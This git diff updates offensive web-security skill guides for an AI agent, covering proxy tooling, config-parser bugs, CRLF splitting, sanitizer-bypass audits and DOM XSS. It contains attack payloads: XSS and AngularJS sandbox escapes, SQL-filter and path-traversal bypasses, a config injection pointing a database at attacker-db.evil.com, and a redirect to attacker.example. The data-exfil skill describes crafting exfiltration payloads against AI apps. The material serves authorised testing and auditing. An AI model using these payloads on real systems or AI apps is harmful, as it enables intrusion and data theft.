+**Checkpoint:** Clear cache and re-measure to confirm delta is reproducible. Modern browsers partition cache by top-level site -- this only works for same-site resources.
+
+## Workflow
+
 1. Map target redirects that differ based on auth/role state
 2. Identify response size differences between states (admin vs user vs anon)
 3. Check if Express.js (ETag auto-generation) or similar framework in use
-4. Test `performance.now()` timing resolution in target browser
-5. Determine if attack requires user interaction or is fully passive
-
-## Key Insight
-These attacks don't require XSS — they exploit browser resource management (sockets, cache, headers) as an oracle. The information leaks through metadata (timing, status codes, resource limits), not content.
+4. Select technique based on available signal:
+   - Size difference -> ETag oracle
+   - Redirect difference -> connection pool exhaustion
+   - Timing difference -> timing-based detection
+5. Run PoC with >=30 samples, calculate mean/stddev
+6. If stddev > mean/3 -> increase samples or try different technique
+7. Confirm cross-origin: PoC must work from attacker origin, not same-origin

--- a/capabilities/web-security/skills/burp-suite/SKILL.md
+++ b/capabilities/web-security/skills/burp-suite/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: burp-suite
-description: Burp Suite Professional MCP integration reference. Use when working with Burp proxy history, sending requests through Burp, using Repeater/Intruder, checking scanner issues, or performing OOB testing with Collaborator.
+description: Queries Burp proxy history, sends requests via Repeater, configures Intruder attacks, retrieves scanner findings, and performs OOB testing with Collaborator. Use when working with Burp proxy history, sending requests through Burp, using Repeater/Intruder, checking scanner issues, or performing OOB testing with Collaborator.
 ---
 
 # Burp Suite MCP Tools
@@ -25,7 +25,7 @@ send_http1_request(
 )
 ```
 
-All requests appear in Burp's proxy history automatically.
+All requests appear in Burp's proxy history automatically. **Verify:** After sending, confirm the request appears with `get_proxy_http_history(count=1, offset=0)`.
 
 ## Proxy History
 
@@ -101,3 +101,9 @@ output_user_options()      set_user_options(json)
 ```
 
 Export config first to understand the schema before setting options.
+
+## Common Workflows
+
+1. **SSRF confirmation via Collaborator**: `generate_collaborator_payload` → inject URL into SSRF parameter via `send_http1_request` → `get_collaborator_interactions` to confirm callback
+2. **IDOR testing via Repeater**: `create_repeater_tab` with request for resource A → modify ID to resource B → compare responses
+3. **Scanner triage**: `get_scanner_issues(count=20, offset=0)` → review severity/confidence → replay high-confidence findings with `send_http1_request` to confirm

--- a/capabilities/web-security/skills/caido-proxy/SKILL.md
+++ b/capabilities/web-security/skills/caido-proxy/SKILL.md
@@ -1,0 +1,90 @@
+---
+name: caido-proxy
+description: "Caido proxy integration for HTTP history search, request replay, fuzzing results, sitemap, and security findings via MCP. Use when you need to search proxy traffic, replay requests with modifications, triage fuzzing results, or document findings in Caido."
+---
+
+# Caido Proxy
+
+MCP integration with Caido proxy. Results load into context -- keep queries focused.
+
+## HTTPQL Quick Reference
+
+```
+req.host.eq:"example.com"           # Exact host match
+req.host.cont:"example"             # Contains
+req.path.cont:"/api/"               # Path contains
+req.method.eq:"POST"                # Exact method
+resp.code.eq:200                    # Status code
+resp.code.gte:400                   # Greater than or equal
+
+# Combinators
+req.host.eq:"a.com" AND req.method.eq:"POST"
+NOT req.path.cont:"/health"
+
+# Security queries
+req.header["authorization"].cont:"Bearer"
+req.body.cont:"password"
+resp.code.gte:500
+```
+
+## MCP Tools
+
+### Search history
+`mcp__caido__list_requests` -- search proxy history with HTTPQL
+- `httpql`: filter string
+- `limit`: max results (default 20, max 100)
+
+### Get request details
+`mcp__caido__get_request` -- full request/response
+- `ids`: request ID array
+- `include`: `["requestHeaders", "requestBody", "responseHeaders", "responseBody"]`
+
+### Replay
+`mcp__caido__send_request` -- send raw HTTP request
+- `raw`: full HTTP request text
+- `host`: target host
+- `port`: target port (default 443)
+- `tls`: use HTTPS (default true)
+
+### Fuzzing results
+`mcp__caido__list_automate_sessions` -- list fuzzing sessions
+`mcp__caido__get_automate_session` -- session details
+`mcp__caido__get_automate_entry` -- fuzzing results with pagination
+
+### Findings
+`mcp__caido__create_finding` -- document a security finding
+- `requestId`: associated request ID
+- `title`: finding title
+- `description`: detailed description
+
+## Common Workflows
+
+### IDOR validation
+```
+1. Search: mcp__caido__list_requests(httpql: 'req.path.cont:"/api/" AND req.method.eq:"GET"', limit: 50)
+2. Inspect: mcp__caido__get_request(ids: ["<id>"], include: ["requestHeaders","requestBody","responseHeaders","responseBody"])
+3. Replay with modified ID: mcp__caido__send_request(raw: "<modified request>", host: "target.com")
+4. Document: mcp__caido__create_finding(requestId: "<id>", title: "IDOR in /api/users/{id}")
+```
+
+### Fuzzing result triage
+```
+1. mcp__caido__list_automate_sessions()
+2. mcp__caido__get_automate_session(id: "<session_id>")
+3. mcp__caido__get_automate_entry(id: "<entry_id>", limit: 20)
+   Compare response sizes/codes for anomalies
+```
+
+## Troubleshooting
+
+| Error | Fix |
+|---|---|
+| `Invalid token` | Run `caido-mcp-server login` |
+| `Connection refused` | Start Caido desktop app |
+| `No such tool` | Check capability MCP config |
+
+```bash
+lsof -i :8080                          # Caido running?
+which caido-mcp-server                 # Binary exists?
+cat ~/.config/caido-mcp-server/token   # Authenticated?
+```

--- a/capabilities/web-security/skills/config-file-parsing-bugs/SKILL.md
+++ b/capabilities/web-security/skills/config-file-parsing-bugs/SKILL.md
@@ -1,0 +1,111 @@
+---
+name: config-file-parsing-bugs
+description: "Exploit config file parser vulnerabilities: line length truncation, duplicate section overwrites, encoding differentials, and fgets()-based C parser bugs. Use when target processes INI/YAML/TOML/properties files, PAM configs, syslog, or any fgets()-based config parser."
+---
+
+# Config File Parsing Bugs
+
+Config file parsers silently truncate, silently drop, and silently overwrite. When a security decision depends on parsed config, parser quirks become security bugs.
+
+## Attack Surface
+
+Config file parsers are vulnerable when:
+1. **Attacker can inject content** into a config file (admin panel, API, SSRF, file write)
+2. **Parser has quirks** that differ from what the consumer expects
+3. **Security decisions** depend on parsed values
+
+## Techniques
+
+### 1. Line Length Truncation
+
+C-based parsers using `fgets()` read a fixed number of bytes per line. Excess bytes remain in the input buffer and are read by the NEXT `fgets()` call as a new line.
+
+**inih (C INI parser):** Default `INI_MAX_LINE = 200` bytes.
+
+```ini
+[section]
+key = AAAA...(195 bytes padding)...\nadmin = true
+
+; Parser sees:
+; Line 1 (200 bytes): "key = AAAA...(truncated)"
+; Line 2 (remainder): "admin = true"   <-- parsed as legitimate entry
+```
+
+**PAM pam_group:** `PAM_GROUP_BUFLEN = 1000` bytes, same pattern.
+
+**BSD syslog (RFC 3164):** 1024-byte message limit. Pad to 1024, inject newline + fake log entry.
+
+**Detection in source code:**
+```c
+// VULNERABLE: fixed-size fgets with no overflow check
+char line[200];
+while (fgets(line, sizeof(line), fp) != NULL) {
+    parse_line(line);
+}
+```
+
+### 2. Duplicate Section/Key Overwrite
+
+| Parser | Behavior |
+|--------|----------|
+| Python `configparser` | Last section wins, last key wins |
+| PHP `parse_ini_file()` | Last key wins within section |
+| inih (C) | Last key wins |
+| Java `Properties.load()` | Last key wins |
+| TOML spec | Duplicate keys are errors (but some parsers silently accept) |
+| YAML spec | Last key wins (undefined behavior per spec) |
+
+```ini
+; Original:
+[database]
+host = secure-db.internal
+
+; Attacker appends:
+[database]
+host = attacker-db.evil.com
+; Result: app connects to attacker-db.evil.com
+```
+
+### 3. PHP parse_ini_file() Quirks
+
+```ini
+; INI_SCANNER_NORMAL treats unquoted ; as comment start
+password = s3cret;drop_this
+; Parsed value: "s3cret"  (everything after ; silently dropped)
+```
+
+`INI_SCANNER_NORMAL` interprets `true/false/null/none` as types -- potential type juggling if app uses loose comparison.
+
+### 4. Whitespace and Encoding Differentials
+
+**Line endings:** `\r\n` vs `\n` -- Linux parser may include `\r` in the value.
+
+**Unicode whitespace:** U+00A0 (non-breaking space), U+200B (zero-width space) -- some parsers treat as part of the value, others as whitespace.
+
+**YAML tabs:** YAML forbids tabs for indentation but some parsers accept them. Tab width differences can change nesting level.
+
+### 5. Environment Variable Interpolation
+
+```ini
+; systemd: Environment="SECRET=%H-secret"  ; %H expands to hostname
+; Docker .env: DB_URL=postgres://${DB_HOST}:5432/app
+; Shell: source /etc/default/myapp
+```
+
+If you can set an environment variable (via SSRF to cloud metadata, another injection), the expanded value in config may differ from what was validated.
+
+## Detection Checklist
+
+1. Identify all config file parsers in the codebase
+2. Determine buffer sizes for C-based parsers (`grep -r 'fgets\|MAX_LINE\|BUF.*LEN'`)
+3. Check if overlong line errors are handled or silently ignored
+4. Test duplicate section/key behavior empirically
+5. Identify injection vectors: can attacker influence config file content?
+6. Verify: does a security decision depend on a parsed config value?
+
+## Related Skills
+
+- **parser-differential-bypass** -- Parsing differentials between processing layers
+- **insecure-defaults** -- When config defaults are insecure
+- **write-path-to-rce** -- When config injection enables arbitrary file write
+- **apache-confusion-attacks** -- Apache httpd config parsing ambiguities

--- a/capabilities/web-security/skills/crlf-response-splitting/SKILL.md
+++ b/capabilities/web-security/skills/crlf-response-splitting/SKILL.md
@@ -59,10 +59,16 @@ If you can inject only one CRLF and not split the body, useful follow-on headers
 - `Refresh: 0;url=https://attacker.example`
 - cache-control mutations for poisoning
 
-## Indicators
-- Header reflection preserves CRLF characters
-- `%0d%0a` behaves differently from `%0a`
-- CSP blocks inline payloads but allows same-origin scripts
+## Detection
+```bash
+# Test for CRLF injection in headers
+curl -sD- "https://target.com/endpoint?param=test%0d%0aX-Injected:true" | rg "X-Injected"
+
+# Compare %0d%0a vs %0a behavior
+curl -sD- "https://target.com/endpoint?param=test%0a%0aX-Injected:true" | rg "X-Injected"
+```
+
+**Checkpoint:** If `X-Injected` appears in response headers with `%0d%0a` but not with `%0a` alone, CRLF injection is confirmed. Check CSP with `curl -sD- URL | rg -i "content-security-policy"` to determine if nested splitting is needed.
 
 ## Chain With
 - `web-cache-deception-path`

--- a/capabilities/web-security/skills/custom-sanitizer-audit/SKILL.md
+++ b/capabilities/web-security/skills/custom-sanitizer-audit/SKILL.md
@@ -1,0 +1,127 @@
+---
+name: custom-sanitizer-audit
+description: "Audit custom sanitization functions for bypass vulnerabilities using the Five-Point Checklist and ordering analysis. Use when encountering homegrown sanitize/filter/clean/escape functions, reviewing input validation, or testing custom security wrappers."
+---
+
+# Custom Sanitizer Audit
+
+Every homegrown security function is a bypass waiting to be found. Framework-provided sanitizers have years of adversarial testing; custom ones have the developer's imagination as their ceiling.
+
+## The Five-Point Checklist
+
+Every custom sanitizer MUST be evaluated against all five points. A failure on ANY single point is a bypass.
+
+### 1. Case-Insensitive?
+
+```php
+// BYPASSABLE: strpos() not stripos()
+if (strpos($input, 'SELECT') !== false) { block(); }
+// Bypass: select, SeLeCt
+
+// SECURE: stripos()
+if (stripos($input, 'SELECT') !== false) { block(); }
+```
+
+### 2. Global Replacement?
+
+```javascript
+// BYPASSABLE: first match only
+input.replace("../", "")
+// Input: "....//etc/passwd" → "../etc/passwd"
+
+// SECURE: global flag
+input.replace(/\.\.\//g, "")
+```
+
+### 3. Recursive?
+
+After one pass of removal, does the remaining string reconstitute the blocked pattern?
+
+```
+Input:    <scrip<script>t>alert(1)</scrip</script>t>
+Pass 1:   inner <script> removed → <script>alert(1)</script>  ← XSS
+```
+
+**Test:** Nest the blocked string inside itself. If the sanitizer runs once, the outer halves collapse into the blocked string.
+
+### 4. Complete?
+
+Does the blocklist cover all dangerous variants?
+
+```javascript
+// BYPASSABLE: blocks <script> but not event handlers
+input.replace(/<script[^>]*>.*?<\/script>/gi, "");
+// Bypass: <img onerror=alert(1) src=x>, <svg onload=alert(1)>
+```
+
+### 5. Consistent Across All Routes?
+
+Is the sanitizer applied uniformly to every entry point?
+
+```bash
+# Find the sanitizer definition, search all call sites,
+# find all routes handling the same input type,
+# diff the two lists — missing routes are bypasses
+```
+
+## Ordering Bugs: Validate-Then-Transform
+
+The sanitizer may be correct in isolation but applied in the wrong order relative to data transformations. See [references/ordering-bugs.md](references/ordering-bugs.md) for patterns.
+
+**General Rule:** decode/normalize/transform FIRST, sanitize LAST, use IMMEDIATELY. Any operation between sanitization and use is a potential bypass.
+
+## The Sixth Check: Security Gate with No Bailout
+
+```php
+// VULNERABLE: check exists but doesn't stop execution
+if (!is_valid_input($data)) {
+    $error = true;  // flag set, never checked before dangerous op
+}
+execute_query($data);  // runs regardless
+```
+
+For every security check, verify the NEXT line is `return`, `exit`, `throw`, `die()`, or `abort()`.
+
+## Detection Workflow
+
+### Step 1: Find All Custom Security Functions
+
+```bash
+grep -rn "function.*sanitiz\|function.*filter\|function.*clean\|function.*escap\|function.*valid" \
+  --include="*.php" --include="*.js" --include="*.py" --include="*.rb" --include="*.java" --include="*.go"
+
+grep -rn "blocked\|blacklist\|blocklist\|forbidden\|banned\|disallowed" \
+  --include="*.php" --include="*.js" --include="*.py" --include="*.rb"
+```
+
+### Step 2: Audit Each Function
+
+```
+Function: sanitize_input() at src/utils/security.php:42
+| Check              | Result | Evidence                          |
+|--------------------|--------|-----------------------------------|
+| Case-insensitive?  | FAIL   | Uses strpos() not stripos()       |
+| Global replacement?| PASS   | Uses str_replace() (global in PHP)|
+| Recursive?         | FAIL   | Single pass, nesting bypasses     |
+| Complete?          | FAIL   | Missing UNION, HAVING keywords    |
+| Consistent?        | FAIL   | Not called in /api/v2/export      |
+```
+
+### Step 3: Check Ordering
+
+Trace data flow backward AND forward from each sanitizer call site. See [references/ordering-bugs.md](references/ordering-bugs.md).
+
+### Step 4: Test Bypasses
+
+For every FAIL, craft a specific bypass payload and test.
+
+## Anti-Patterns by Language
+
+See [references/anti-patterns.md](references/anti-patterns.md) for the full table of common anti-patterns across PHP, JS, Python, Ruby, Java, and Go.
+
+## Related Skills
+
+- **parser-differential-bypass** -- sanitizer and consumer parse input differently
+- **unicode-normalization-bypass** -- Unicode NFKC/NFKD undoes sanitization
+- **dompurify-mxss-bypass** -- DOMPurify sanitizer bypass
+- **insecure-defaults** -- sanitizer has fail-open behavior on error

--- a/capabilities/web-security/skills/custom-sanitizer-audit/references/anti-patterns.md
+++ b/capabilities/web-security/skills/custom-sanitizer-audit/references/anti-patterns.md
@@ -1,0 +1,44 @@
+# Common Anti-Patterns by Language
+
+| Language | Anti-Pattern | Why It Fails |
+|----------|-------------|--------------|
+| PHP | `str_replace()` without recursive loop | Nesting bypass |
+| PHP | `preg_replace()` with `/e` flag | Code execution in replacement |
+| PHP | `strip_tags()` then `urldecode()` | Ordering bypass |
+| JS | `.replace()` without `/g` flag | First-match-only |
+| JS | `$&`, `$'` in `.replace()` replacement string | User-controlled replacement reinjection |
+| Python | `re.sub()` with user-controlled pattern | ReDoS, injection |
+| Ruby | `gsub` with string (not regex) first arg | Literal match only, no anchoring |
+| Java | `String.replace()` (literal, global) vs `replaceFirst()` | Method confusion |
+| Go | `strings.Replace()` with `n=1` | First-match-only |
+| All | Blocklist instead of allowlist | Completeness failure by design |
+
+## Rationalizations to Reject
+
+- **"The WAF will catch it"** -- WAF and app may parse differently (see parser-differential-bypass)
+- **"Nobody would think to try that"** -- Automated tools test every permutation
+- **"We only use this internally"** -- Internal tools become external via SSRF, compromised credentials
+- **"It's just an extra layer of defense"** -- If it's the ONLY layer between source and sink, it's the entire defense
+
+## Examples
+
+**Example 1: PHP SQL filter bypass via nesting + case**
+```
+Sanitizer: str_replace(['SELECT','INSERT','DELETE'], '', $input)
+Payload:   sElSELECTeCt * FROM users
+Result:    sEleCt * FROM users  (inner SELECT removed, outer reconstructs with mixed case)
+```
+
+**Example 2: JS XSS filter bypass via ordering**
+```
+Sanitizer: input.replace(/<script>/gi, '') applied BEFORE urldecode
+Payload:   %3Cscript%3Ealert(1)%3C/script%3E
+Flow:      filter sees encoded (no match) → urldecode → <script>alert(1)</script>
+```
+
+**Example 3: Path traversal via non-recursive replace**
+```
+Sanitizer: path.replace('../', '')
+Payload:   ....//....//etc/passwd
+Flow:      first ../ removed from each group → ../../etc/passwd
+```

--- a/capabilities/web-security/skills/custom-sanitizer-audit/references/ordering-bugs.md
+++ b/capabilities/web-security/skills/custom-sanitizer-audit/references/ordering-bugs.md
@@ -1,0 +1,81 @@
+# Ordering Bugs: Validate-Then-Transform
+
+## Sanitize-Then-Decode (Most Common)
+
+```php
+// VULNERABLE: sanitize runs on encoded input, decode undoes it
+$input = strip_tags($user_input);      // strips <script>
+$input = urldecode($input);            // %3Cscript%3E becomes <script>
+echo $input;                           // XSS
+
+// SECURE: decode first, then sanitize
+$input = urldecode($user_input);
+$input = strip_tags($input);
+```
+
+```python
+# VULNERABLE: validate then normalize
+if not re.search(r'[<>]', user_input):  # clean
+    output = html.unescape(user_input)   # &lt;script&gt; → <script>
+
+# SECURE: normalize then validate
+normalized = html.unescape(user_input)
+if not re.search(r'[<>]', normalized):
+    output = normalized
+```
+
+## Sanitize-Then-Concatenate
+
+```java
+// VULNERABLE: sanitize individual parts, concatenate creates injection
+String table = sanitize(request.getParameter("table"));  // "users"
+String col = sanitize(request.getParameter("col"));      // "name"
+String query = "SELECT " + col + " FROM " + table;
+// col = "name FROM users; DROP TABLE users; --" after concatenation
+
+// SECURE: parameterized queries, never concatenate
+```
+
+## Sanitize-Then-Template
+
+```javascript
+// VULNERABLE: sanitize input, but template engine re-interprets
+let safe = escapeHtml(userInput);       // escapes < > & " '
+let html = template.render({data: safe}); // template uses {{{data}}} (raw)
+// Triple-mustache in Handlebars bypasses escaping
+
+// Also watch for:
+// - Jinja2 |safe filter after escaping
+// - EJS <%- %> (unescaped) vs <%= %> (escaped)
+// - Thymeleaf th:utext (unescaped) vs th:text (escaped)
+```
+
+## Sanitize-Then-Normalize (Unicode)
+
+```python
+# VULNERABLE: filter then normalize
+if '<' not in user_input and '>' not in user_input:
+    normalized = unicodedata.normalize('NFKC', user_input)
+    # U+FF1C (fullwidth <) normalizes to < after the check passed
+
+# SECURE: normalize first
+normalized = unicodedata.normalize('NFKC', user_input)
+if '<' not in normalized and '>' not in normalized:
+    output = normalized
+```
+
+## Second-Order Bypass
+
+```python
+# VULNERABLE: sanitize on input, store, retrieve unsanitized later
+def submit_comment(request):
+    comment = sanitize_xss(request.POST['comment'])
+    db.save(comment)  # stored clean
+
+def admin_view(request):
+    comments = db.get_all_comments()
+    for c in comments:
+        send_email(subject="New comment", body=c.text)  # HTML email, no escaping
+```
+
+The sanitizer runs at input time, but the stored value is consumed by a different code path that doesn't sanitize. Check: is the sanitized value used in ALL consumers, or only the one the developer was thinking about?

--- a/capabilities/web-security/skills/data-exfil/SKILL.md
+++ b/capabilities/web-security/skills/data-exfil/SKILL.md
@@ -1,14 +1,7 @@
 ---
 name: data-exfil
-description: |
-  AI/LLM data exfiltration techniques via rendered markdown, HTML-in-markdown, tool artifacts, domain encoding, and url_safe bypasses. Use when crafting exfil payloads for AI red teaming, analyzing AI app rendering pipelines for exfil surfaces, bypassing URL filters/sanitizers, or reviewing AI-generated output for exfil risk.
-allowed-tools:
-  - read
-  - write
-  - edit_file
-  - bash
-  - grep
-  - glob
+description: AI/LLM data exfiltration techniques via rendered markdown, HTML-in-markdown, tool artifacts, domain encoding, and url_safe bypasses. Use when crafting exfil payloads for AI red teaming, analyzing AI app rendering pipelines for exfil surfaces, bypassing URL filters/sanitizers, or reviewing AI-generated output for exfil risk.
+allowed-tools: read, write, edit_file, bash, grep, glob
 ---
 
 # AI Data Exfiltration Techniques

--- a/capabilities/web-security/skills/dom-vulnerability-detection/SKILL.md
+++ b/capabilities/web-security/skills/dom-vulnerability-detection/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: dom-vulnerability-detection
-description: DOM-based XSS and client-side vulnerability detection via dynamic analysis — trace attacker-controlled sources to dangerous sinks, audit postMessage handlers, test CSTI in Angular/Vue/htmx, and check for DOM clobbering. Use when auditing JavaScript code, reviewing client-side security, analyzing DOM manipulation, or testing postMessage handlers.
+description: DOM-based XSS and client-side vulnerability detection via dynamic analysis -- trace attacker-controlled sources to dangerous sinks, audit postMessage handlers, test CSTI in Angular/Vue/htmx, and check for DOM clobbering. Use when auditing JavaScript code, reviewing client-side security, analyzing DOM manipulation, or testing postMessage handlers.
 ---
 
 ## Sources (attacker-controlled input)
@@ -14,13 +14,12 @@ description: DOM-based XSS and client-side vulnerability detection via dynamic a
 ### 1. Find sources reaching sinks
 ```bash
 # Search for dangerous sinks in JS files
-grep -rn "innerHTML\|outerHTML\|document\.write\|\.html(" --include="*.js" --include="*.tsx" src/
-grep -rn "eval(\|setTimeout(\|setInterval(\|new Function(" --include="*.js" src/
+rg "innerHTML|outerHTML|document\.write|\.html\(" --type js --type ts -n src/
+rg "eval\(|setTimeout\(|setInterval\(|new Function\(" --type js -n src/
 
 # Search for postMessage handlers without origin checks
-grep -rn "addEventListener.*message" --include="*.js" src/
+rg "addEventListener.*message" --type js -n src/
 ```
-If grep finds no sinks, check for dynamically loaded scripts (lazy imports, `document.createElement('script')`) and framework render methods that bypass static grep.
 
 ### 2. Trace data flow
 For each sink found, trace backwards: does attacker-controlled input reach it?
@@ -28,46 +27,46 @@ For each sink found, trace backwards: does attacker-controlled input reach it?
 - Via variable: `const data = getParam('q'); ... el.innerHTML = data`
 - Via storage: `localStorage.setItem('x', userInput); ... el.innerHTML = localStorage.getItem('x')`
 
+**Checkpoint:** For each sink, document: source -> transformations -> sink. If no attacker-controlled source reaches the sink, mark as not exploitable and move on.
+
 ### 3. Check sanitization
-If sanitization exists, verify it's adequate:
-- DOMPurify → check version, config (is `ALLOW_UNKNOWN_PROTOCOLS` set?)
-- Custom sanitizer → see `custom-sanitizer-audit` skill
-- Framework auto-escaping → verify not bypassed by `v-html`, `dangerouslySetInnerHTML`, `[innerHTML]`
-If sanitization status is ambiguous, attempt bypass patterns from step 6 before marking safe.
+If sanitization exists, verify it is adequate:
+- DOMPurify -> check version, config (is `ALLOW_UNKNOWN_PROTOCOLS` set?)
+- Custom sanitizer -> see `custom-sanitizer-audit` skill
+- Framework auto-escaping -> verify not bypassed by `v-html`, `dangerouslySetInnerHTML`, `[innerHTML]`
 
 ### 4. Audit postMessage handlers
 ```javascript
-// VULNERABLE — no origin check
+// VULNERABLE -- no origin check
 window.addEventListener('message', (e) => {
   document.getElementById('output').innerHTML = e.data.html;
 });
 
-// SAFE — origin validated
+// SAFE -- origin validated
 window.addEventListener('message', (e) => {
   if (e.origin !== 'https://trusted.com') return;
   // ... process e.data
 });
 ```
 
-### 5. Test CSTI (Client-Side Template Injection)
-- **AngularJS**: Any user input bound to Angular scope and rendered via `ng-bind-html` or `{{ }}` interpolation enables CSTI. If URL params, hash, or form values flow into scope variables that Angular evaluates, inject `{{constructor.constructor('alert(1)')()}}` as the sandbox escape payload. Check: does `$scope.variable = userInput` exist where `variable` appears in an `ng-bind-html` or `{{ variable }}` template? If yes, it is exploitable. The key insight: AngularJS evaluates template expressions in the scope context, so `searchQuery` from `?q=` reaching `{{searchQuery}}` or `ng-bind-html="searchQuery"` is code execution.
-- **Vue.js**: `v-html` directive bypasses Vue's auto-escaping. If user-controlled data (from API, URL, or form) reaches a `v-html` binding, it renders raw HTML. Safe: `{{ variable }}` (auto-escaped). Dangerous: `v-html="variable"`. Check both paths explicitly.
-- **htmx**: `hx-get`, `hx-post`, `hx-vals` with user-controlled URLs or values. If URL params populate `hx-get` targets, attacker controls which endpoint htmx fetches from.
+**Checkpoint:** For each handler, verify: (1) strict `e.origin` equality check exists, (2) no `window.origin` comparison, (3) no `startsWith`/`endsWith` on origin, (4) data is not passed to dynamic execution (`window[data.func]`).
 
-### 6. Check browser quirks and library gadgets
-- **DOM clobbering**: `<form id="x"><input name="action" value="javascript:alert(1)">` — overwrites `document.x.action`
-- **Mutation XSS**: HTML that passes sanitizer but mutates in browser DOM — see `dompurify-mxss-bypass` skill
-- **Prototype pollution**: `__proto__` in URL params or JSON reaching `Object.assign`/spread — e.g. `?__proto__[isAdmin]=true` pollutes `Object.prototype` globally when merged via `Object.assign({}, defaults, urlParams)`
-- **jQuery .text() entity re-decoding**: `DOMPurify.sanitize(val)` → jQuery `$('<div>'+clean+'</div>').text()` → `innerHTML` = XSS. `.text()` decodes HTML entities that DOMPurify passed through, producing raw tags that innerHTML executes. Also applies to `.val()` and `.textContent` reads.
-- **moment.js format injection**: If user input controls `moment().format(input)` and output hits innerHTML, square brackets emit content verbatim: `moment().format("[<img src=x onerror=alert(1)>]")`
-- **javascript: URI parsing**: `new URL("javascript://host:443/path%0aalert(1)")` populates `.hostname`, `.port`, `.pathname` — passes allowlist checks. After `javascript:` scheme is stripped, `//` starts a JS single-line comment; `%0a` newline ends it and trailing code executes. Payload: `javascript://ALLOWED_HOST:443/%0aalert(document.domain)`
+### 5. Test CSTI (Client-Side Template Injection)
+- **AngularJS**: `{{constructor.constructor('alert(1)')()}}`
+- **Vue.js**: check if user input reaches `v-html` or template interpolation
+- **htmx**: `hx-get`, `hx-post` with user-controlled URLs
+
+### 6. Check browser quirks
+- **DOM clobbering**: `<form id="x"><input name="action" value="javascript:alert(1)">` -- overwrites `document.x.action`
+- **Mutation XSS**: HTML that passes sanitizer but mutates in browser DOM -- see `dompurify-mxss-bypass` skill
+- **Prototype pollution**: `__proto__` in URL params or JSON reaching `Object.assign`/spread
 
 ### 7. Verify exploitability
 Build a PoC proving attacker-controlled input triggers the sink:
 ```
 https://target.com/page#<img src=x onerror=alert(document.domain)>
 ```
-Confirm: payload executes, not just reflected. Check CSP — if blocked, see `csp-bypass` skill.
+**Checkpoint:** Confirm payload executes (not just reflected). Check CSP -- if blocked, see `csp-bypass` skill.
 
 ## Chain With
-- `csp-bypass` (CSP blocks execution), `dompurify-mxss-bypass` (DOMPurify present), `dom-vulnerability-static-analysis` (grep-based pre-screening), `aem-sling-exploitation` (AEM-specific XSS gadgets)
+- `csp-bypass` (CSP blocks execution), `dompurify-mxss-bypass` (DOMPurify present), `custom-sanitizer-audit` (homegrown sanitizer), `self-xss-escalation` (payload only fires in own session)

--- a/capabilities/web-security/skills/dom-vulnerability-static-analysis/SKILL.md
+++ b/capabilities/web-security/skills/dom-vulnerability-static-analysis/SKILL.md
@@ -1,88 +1,73 @@
 ---
 name: dom-vulnerability-static-analysis
-description: Static code analysis for DOM-based vulnerabilities in client-side JavaScript — source/sink enumeration via grep and AST tools, data flow tracing, sanitization assessment, and framework-specific sink detection. Use when performing pre-commit reviews, auditing large codebases without dynamic execution, or triaging minified code for XSS issues.
+description: Static code analysis for DOM-based vulnerabilities in client-side JavaScript -- source/sink enumeration via grep and AST tools, data flow tracing, sanitization assessment, and framework-specific sink detection. Use when performing pre-commit reviews, auditing large codebases without dynamic execution, or triaging minified code for XSS issues.
 ---
 
-Static analysis framework for DOM XSS — no dynamic execution needed.
+Static analysis framework for DOM XSS -- no dynamic execution needed.
 
 ## 1. Enumerate sources and sinks
 
 ```bash
 # Find all dangerous sinks
-grep -rn 'innerHTML\|outerHTML\|document\.write\|insertAdjacentHTML\|\.html(' \
-  --include="*.js" --include="*.jsx" --include="*.ts" --include="*.tsx" src/
+rg 'innerHTML|outerHTML|document\.write|insertAdjacentHTML|\.html\(' \
+  --type js --type ts -n src/
 
 # Find eval-family sinks
-grep -rn 'eval(\|new Function(\|setTimeout([^,]*["\x27]\|setInterval([^,]*["\x27]' \
-  --include="*.js" --include="*.ts" src/
+rg 'eval\(|new Function\(|setTimeout\([^,]*["\x27]|setInterval\([^,]*["\x27]' \
+  --type js --type ts -n src/
 
 # Find URL assignment sinks
-grep -rn 'location\.\(href\|assign\|replace\)\s*=\|window\.open(' \
-  --include="*.js" --include="*.ts" src/
+rg 'location\.(href|assign|replace)\s*=|window\.open\(' \
+  --type js --type ts -n src/
 
 # Find attacker-controlled sources
-grep -rn 'location\.\(hash\|search\|href\)\|document\.URL\|document\.referrer\|window\.name\|postMessage' \
-  --include="*.js" --include="*.ts" src/
+rg 'location\.(hash|search|href)|document\.URL|document\.referrer|window\.name|postMessage' \
+  --type js --type ts -n src/
 
 # Framework-specific sinks
-grep -rn 'dangerouslySetInnerHTML\|v-html\|ng-bind-html\|\[innerHTML\]\|hx-get\|hx-post' \
-  --include="*.js" --include="*.tsx" --include="*.html" --include="*.vue" src/
-
-# AngularJS CSTI: user input bound to scope then evaluated in {{ }} templates
-# Payload: {{constructor.constructor('alert(1)')()}} (sandbox escape for AngularJS 1.x)
-grep -rn 'ng-app\|ng-bind\|\$scope\.\|ng-model\|ng-bind-html' \
-  --include="*.html" --include="*.js" src/
-
-# Prototype pollution sources: Object.assign/spread with user-controlled input
-grep -rn 'Object\.assign\|\.\.\..*param\|\.\.\..*query\|merge(' \
-  --include="*.js" --include="*.ts" src/
+rg 'dangerouslySetInnerHTML|v-html|ng-bind-html|\[innerHTML\]|hx-get|hx-post' \
+  --type js --type html -g "*.vue" -g "*.tsx" -n src/
 ```
 
-## 2. Trace data flow (source → sink)
+**Checkpoint:** Record total sink count and source count. If sinks > 50, prioritize by category (eval-family first, then innerHTML, then URL assignment).
+
+## 2. Trace data flow (source -> sink)
 
 For each sink hit, trace backwards to determine if attacker input reaches it:
 
 ```bash
 # Find the variable assigned to the sink, then trace its origin
-# Example: el.innerHTML = content → where does `content` come from?
-grep -rn "content\s*=" --include="*.js" src/ | grep -i "location\|param\|query\|hash\|input\|request"
+# Example: el.innerHTML = content -- where does `content` come from?
+rg "content\s*=" --type js -n src/ | rg -i "location|param|query|hash|input|request"
 ```
 
 Classify each finding:
-- **Direct flow**: source → sink with no sanitization = **vulnerability**
-- **Sanitized flow**: source → sanitizer → sink = check sanitizer adequacy
-- **Static content**: hardcoded string → sink = **not exploitable**
+- **Direct flow**: source -> sink with no sanitization = **vulnerability**
+- **Sanitized flow**: source -> sanitizer -> sink = check sanitizer adequacy
+- **Static content**: hardcoded string -> sink = **not exploitable**
 
 ## 3. Assess sanitization
 
 ```bash
 # Find DOMPurify usage
-grep -rn "DOMPurify\|dompurify\|sanitize(" --include="*.js" --include="*.ts" src/
+rg "DOMPurify|dompurify|sanitize\(" --type js --type ts -n src/
 
-# Find custom sanitizers
